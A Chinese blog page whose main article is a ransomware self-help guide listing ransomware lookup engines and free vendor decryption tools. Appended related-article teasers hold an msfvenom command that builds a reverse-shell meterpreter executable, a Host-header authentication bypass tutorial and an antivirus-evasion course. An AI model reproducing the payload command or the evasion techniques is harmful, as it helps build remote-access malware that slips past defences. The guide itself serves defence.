代码编织梦想

经常会有一些小伙伴问:中了勒索病毒,该怎么办,可以解密吗?

第一次遇到勒索病毒是在早几年的时候,客户因网站访问异常,进而远程协助进行排查。登录服务器,在站点目录下发现所有的脚本文件及附件后缀名被篡改,每个文件夹下都有一个文件打开后显示勒索提示信息,这便是勒索病毒的特征。

出于职业习惯,我打包了部分加密文件样本和勒索病毒提示信息用于留档,就在今天,我又重新上传了样本,至今依然无法解密。

作为一个安全工程师,而非一个专业的病毒分析师,我们可以借助各大安全公司的能力,寻找勒索病毒的解密工具。

本文整理了一份勒索病毒自救指南,通过勒索病毒索引引擎查找勒索病毒相关信息,再通过各个安全公司提供的免费勒索软件解密工具解密。当然,能否解密全凭运气,so,平时还是勤打补丁多备份。

勒索病毒搜索引擎

在勒索病毒搜索引擎输入病毒名、勒索邮箱、被加密后文件的后缀名,或直接上传被加密文件、勒索提示信息,即可可快速查找到病毒详情和解密工具。

在这里插入图片描述

这些网站的解密能力还在持续更新中,是值得收藏的几个勒索病毒工具型网站。

【360】 勒索病毒搜索引擎,支持检索超过800种常见勒索病毒,

http://lesuobingdu.360.cn

【腾讯】 勒索病毒搜索引擎,支持检索超过 300 种常见勒索病毒

https://guanjia.qq.com/pr/ls/

【启明】VenusEye勒索病毒搜索引擎,超300种勒索病毒家族

https://lesuo.venuseye.com.cn/

【奇安信】勒索病毒搜索引擎

https://lesuobingdu.qianxin.com/

【深信服】勒索病毒搜索引擎

https://edr.sangfor.com.cn/#/information/ransom_search

勒索软件解密工具集

很多安全公司都提供了免费的勒索病毒解密工具下载,收集和整理相关下载地址,可以帮助我们了解和获取最新的勒索病毒解密工具。

【腾讯哈勃】勒索软件专杀工具

https://habo.qq.com/tool/index

【金山毒霸】勒索病毒免疫工具

http://www.duba.net/dbt/wannacry.html

【火绒】安全工具下载

http://bbs.huorong.cn/forum-55-1.html

【瑞星】解密工具下载

http://it.rising.com.cn/fanglesuo/index.html

【nomoreransom】勒索软件解密工具集

https://www.nomoreransom.org/zh/index.html

【MalwareHunterTeam】勒索软件解密工具集

https://id-ransomware.malwarehunterteam.com/

【卡巴斯基】免费勒索解密器

https://noransom.kaspersky.com/

【Avast】免费勒索软件解密工具

https://www.avast.com/zh-cn/ransomware-decryption-tools

【Emsisoft】免费勒索软件解密工具

https://www.emsisoft.com/ransomware-decryption-tools/free-download

【Github项目】勒索病毒解密工具收集汇总

https://github.com/jiansiting/Decryption-Tools

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/qq_25645753/article/details/110470592

便宜的国内OCSP SSL证书-爱代码爱编程

随着全球各行各业的数字化飞速发展,我们享受着扫码支付,人脸识别等信息技术带来的便捷服务同时,也面临着一系列的网络安全威胁挑战。而中国作为网络大国,高度重视国内网络安全,在2019年5月发布网络安全等级保护制度2.0(简称等保2.0)。 在等保2.0中表示,不管是政府机关,高校或是企业,都应该积极履行自身的网络安全义务,并且明确提出某些层面需要使用密码技术

Web渗透测试之HTTP头部注入:Host实现身份验证绕过-爱代码爱编程

文章目录 前言题目分析总结 前言   本篇将讲解在Host参数存在注入漏洞时,如何利用burpsuite修改Host参数实现身份验证绕过并达到我们想要的目的。 题目分析 题目页面如下:   既然要利用Host参数实现注入操作,那么就必须得先确认Host是否存在可注入漏洞。有时为了防止服务器收到无法识别的域名请求,会将服务器配置为后备选项。

msf中收到了sessions却不反弹meterpreter的原因-爱代码爱编程

msf中收到了sessions却不反弹meterpreter的原因 问题描述: 生成木马 ​msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.189.130 lport=12346 -f exe >/hack.exe

CNVD通用漏洞挖掘经验分享-爱代码爱编程

一、首先说一下通用漏洞很好得,但是证书确实不是很容易(大佬请无视)。 二、关于证书获取条件,先看一下CNVD的官方解释 归档漏洞的证书颁发条件为:(1)对于中危及中危以上通用型漏洞(CVSS2.0基准评分超过4.0分)(除小厂商的产品、非重要APP、黑盒测试案例不满10起等不颁发证书),(2)涉及电信行业单位(中国移动、中国联通、中国电信及中国铁塔公司

南域剑盟50课-爱代码爱编程

南域剑盟50课 下载地址 https://pan.baidu.com/s/1JIpOq2RufgFQU0KHP9NE1g 扫码下面二维码关注公众号回复100191 获取分享码   本视频主要包含以下内容: C32Asm中文替换法 C32Asm字符加1减1法 LordPE修改入口法 MYccl的应用 MYCCL内存特征码定位方法 MY

SASE:通往零信任之路-爱代码爱编程

白山云科技 11月26日,YUNDUN云安全专家张欢,受邀参与成都·世界信息安全大会,并于大会上发表演讲《云原生应用零信任实践》,本文将对演讲精华进行提炼分享。   边界防护体系还能坚持多久?   2020年初的一场疫情促使移动远程办公成为主流,来自不同地方的人通过互联网,接入到公司总部,访问重要的业务信息。IT环境已经在悄然变化,接入网络的